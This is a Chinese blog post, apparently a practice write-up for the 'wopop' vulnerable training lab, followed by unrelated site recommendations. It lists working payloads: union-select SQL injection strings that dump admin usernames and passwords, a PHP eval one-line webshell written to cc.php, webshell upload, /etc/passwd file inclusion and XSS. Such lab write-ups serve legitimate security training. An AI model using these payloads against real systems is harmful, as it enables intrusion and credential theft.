wopop靶场漏洞挖掘练习

最新推荐文章于 2024-10-14 22:42:36 发布
最新推荐文章于 2024-10-14 22:42:36 发布
阅读量593 收藏 5
点赞数 10
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82451607/article/details/142218443
版权

一、sql注入漏洞

1.在搜索框输入-1 union select 1,2,3#

可以看到页面有回显

2.查询数据库名

-1 union select 1,2,database()#

3.通过查询admin表的数据可以进行登录后台

-1 union select 1,2,group_concat(user_name,user_pass) from admin#

二、文件上传漏洞

1.登录后台最下面有一个上传文件

2.上传一句话木马

上传并访问一句话木马

3.使用蚁剑连接

三、命令执行漏洞

1.在shell输入框输入whoami页面会执行

2.尝试写入一句话木马

echo '<?php @eval($_POST[cmd]); ?>' > cc.php

3.访问cc.php

可以访问成功

四、文件包含漏洞

1.在关于界面可以看到url里使用file进行传参

尝试能不能访问其他文件

可以访问到/etc/passwd文件 说明存在文件包含漏洞

五、XSS漏洞

在登录页面的username处输入弹窗代码

发现可以出现弹窗 说明存在xss漏洞

cc775210
关注
蓝色大气的登录模板
07-03
而"Wopop_files"很可能是一个文件夹,里面包含了与"Wopop.html"相关的所有资源,如CSS样式文件、JavaScript脚本、图片和其他辅助文件。 综上所述,这个"蓝色大气的登录模板"涵盖了前端开发的基础知识,包括HTML结构...
HTML登陆页面案例收藏.zip
02-02
Bootstrap后台登录界面模板.zip Bootstrap响应式登录界面模板.zip Bootstrap响应式开场动画登录界面模板.zip ...Wopop简洁后台登录界面模板 .zip 粉红色简单用户登录界面模板 .zip ............等等
漂亮的login登陆页面html模板
12-04
`Wopop_files`可能是一个包含额外资源的目录,比如CSS文件(用于样式控制)、JavaScript文件(用于交互功能,如表单验证、按钮点击效果等)或者图像文件(如背景图片、图标等)。这些文件通常与`index.html`配合工作...
轮播台的简单代码
12-31
- "mbts_30_Wopop":这可能是轮播台代码的主文件,或者是一个包含相关资源(如CSS样式表、JavaScript脚本)的文件夹。在解压后,需要检查其内容并将其引入到HTML文件中,以便与自定义的图片资源一起运行轮播台。 在...
bootstrap前端开发框架开发利器所得到的多订单的
03-19
这个压缩包“mbts_30_Wopop”很可能包含了完整的Bootstrap库,包括CSS、JavaScript文件以及可能的自定义主题和组件,为快速开发多订单管理界面提供了便利。 Bootstrap的核心特性包括一个灵活的网格系统,允许开发者...
MySQL数据库的详细学习步骤
2401_87352036的博客
10-11 1147
MySQL数据库的详细学习步骤可以归纳为以下几个阶段,每个阶段都包含了特定的学习内容和目标。
PyQt 的Tree Widget中拖放和点击的异常行为
weixin_44617651的博客
10-10 487
在 PyQt 的 ​​QTreeWidget​​ 中,如果你遇到 拖放 和 点击 的异常行为,可能是由于信号处理、事件拦截、拖放设置或树结构配置等问题导致的。以下是一些可能的常见问题和解决方案。
sqli-labs less-23 注释符绕过
wanggonghanfei的博客
10-10 1262
sqli-labs less-23 注释符绕过
ATAM需求说明-系统架构师(七十六)
ke1ying的博客
10-08 1100
1体系结构权衡分析法ATAM(Architecture Trade Off Analyzer Method)是一种常见的结构权衡分析法,该框架主要关注系统的(),针对性能、安全性、可用性和可修改性,在系统开发前进行分析、评价和这种。A共享数据库的集成方式通常将应用程序的数据存储在一个共享数据库中,通过制定统一的数据库模式来处理不同应用集成需求。场景和需求的收集,架构视图和场景的实现,属性模型的构造和分析,架构评价和折中。7企业信息资源集成管理的前提是对企业()的集成,其核心是对企业()的集成。
mysql锁之乐观锁、悲观锁、表锁、行锁、共享锁、排他锁
最新发布
qq_68883928的博客
10-14 533
锁是计算机协调多个进程或线程并发访问某一个资源的机制,在数据库中,除传统的计算资源(CPU、RAM、I/O)的争用以外,数据也是一种供许多用户共享的资源。如何保证数据并发访问的一致性、有效性是所在有数据库必须解决的一个问题,锁冲突也是影响数据库并发访问性能的一个重要因素。从这个角度来说,锁对数据库而言显得尤其重要,也更加复杂。
PostgreSQL学习笔记十:锁机制详解
软件行业技术文化交流。
10-11 1226
它通过不同级别的锁来控制对数据对象的并发访问,主要包括表级锁、行级锁、页级锁、咨询锁(Advisory Locks)以及死锁(Deadlocks)。咨询锁可以用于实现更细粒度的锁控制,例如,在不同的事务之间同步对特定资源的访问。咨询锁可以是会话级别的或事务级别的,允许用户在不同的进程或事务之间进行协调。:设计事务时,应尽量减少锁的持有时间,并避免长时间运行的事务,因为这会增加死锁的风险。这些锁可以是行级的、事务级的,或者是咨询锁(advisory locks),它们用于控制对表或行的并发访问。
SQLite数据库在Android中的应用及操作方式
Good_tea_h的博客
10-14 525
SQLite数据库在Android中的应用非常广泛,它作为一个轻量级的关系型数据库,以其高效、可靠和易于使用的特点,成为了Android平台上存储和管理数据的首选方案。以下是对SQLite数据库在Android中的应用及操作方式的详细介绍。
同城O2O系统源码与跑腿配送平台的架构设计与开发方案详解
meihusdk的博客
10-08 573
同城O2O系统与跑腿配送平台的开发,既是技术的挑战,也是商业机会的探索。通过合理的架构设计与清晰的开发方案,开发者可以构建出高效、稳定且易于扩展的平台,为用户提供更为便捷的服务。
数据库-01MYSQL-001MySQL知识点查漏补缺
10-12 216
mysql数据库知识点锦集
实用宝典:元器件外贸独立站电子元件数据库设置完全手册
dhs_abin的博客
10-14 825
您是否在为元器件外贸独立站如何部署电子元件数据库而烦恼?芯站点提供了一份详尽的指南,帮助您了解从规划到实施的全过程,以构建高效且用户友好的电子元器件数据库
管家婆-本地化-重装数据库导入数据库mdf——未来之窗数据恢复专家
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
10-13 165
让我们积极投身于技术共享的浪潮中,不仅仅是作为受益者,更要成为贡献者。无论是分享自己的代码、撰写技术博客,还是参与。的维护和改进,每一个小小的举动都可能成为推动技术进步的巨大力量。拥抱开源与共享,见证科技进步奇迹,畅享人类幸福时光!关闭管家婆和数据库服务重启。
中文学术期刊(普刊)-全学科
刘大猫
10-12 310
中国知网是最负盛名的中文数据图书馆,收录来自自然科学、社会科学的优质学术期刊;维普网创建于2000年,是中国最大的综合性文献服务网站;万方数据库中国知名专业学术数据库,收录范围涵盖期刊、会议纪要、论文、学术成果、学术会议论文。 作为国内知名数据库,被知网、万方、维普数据库收录的学术期刊对科研工作者也有着重要意义。 以下期刊被收录于知网/万方/维普数据库,征稿范围覆盖教育、交通、计算机、电力、建筑、科技和农业等领域,立即联系编辑,获得最新期刊资讯!
SpringBoot 集成 Redis 总结
SOS5418818845的博客
10-11 494
Redis 是一个开源的内存数据结构存储系统,它可以用作数据库、缓存和消息中间件。Redis 以其高效的性能、丰富的数据结构和简单的 API 而受到广泛关注。它将数据存储在内存中,并可以通过持久化机制将数据保存到硬盘上,以防止数据丢失。
PHP预处理机制详解
sheji888的专栏
10-08 882
预处理机制(Prepared Statements)是一种数据库访问技术,它允许在发送SQL语句到数据库之前,对SQL语句进行编译和解析。这种机制通过把SQL语句和数据分开处理,避免了直接将用户输入拼接到SQL语句中可能导致的SQL注入问题。在PHP中,预处理机制通常与PDO(PHP Data Objects)或MySQLi扩展一起使用。PDO提供了一个统一的接口来访问多种数据库,而MySQLi则是专门为MySQL数据库设计的扩展。PHP预处理机制是一种提高数据库操作效率和安全性的重要技术。
MySQL - 索引
Golemon的博客
10-09 638
索引(index)是帮助数据库高效获取数据的数据结果。insertupdatedeleteMySQL数据库支持的索引结构有很多,如:Hash索引、B+Tree索引、Full-Text索引等。平常所说的索引默认是B+Tree结构组织的索引。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值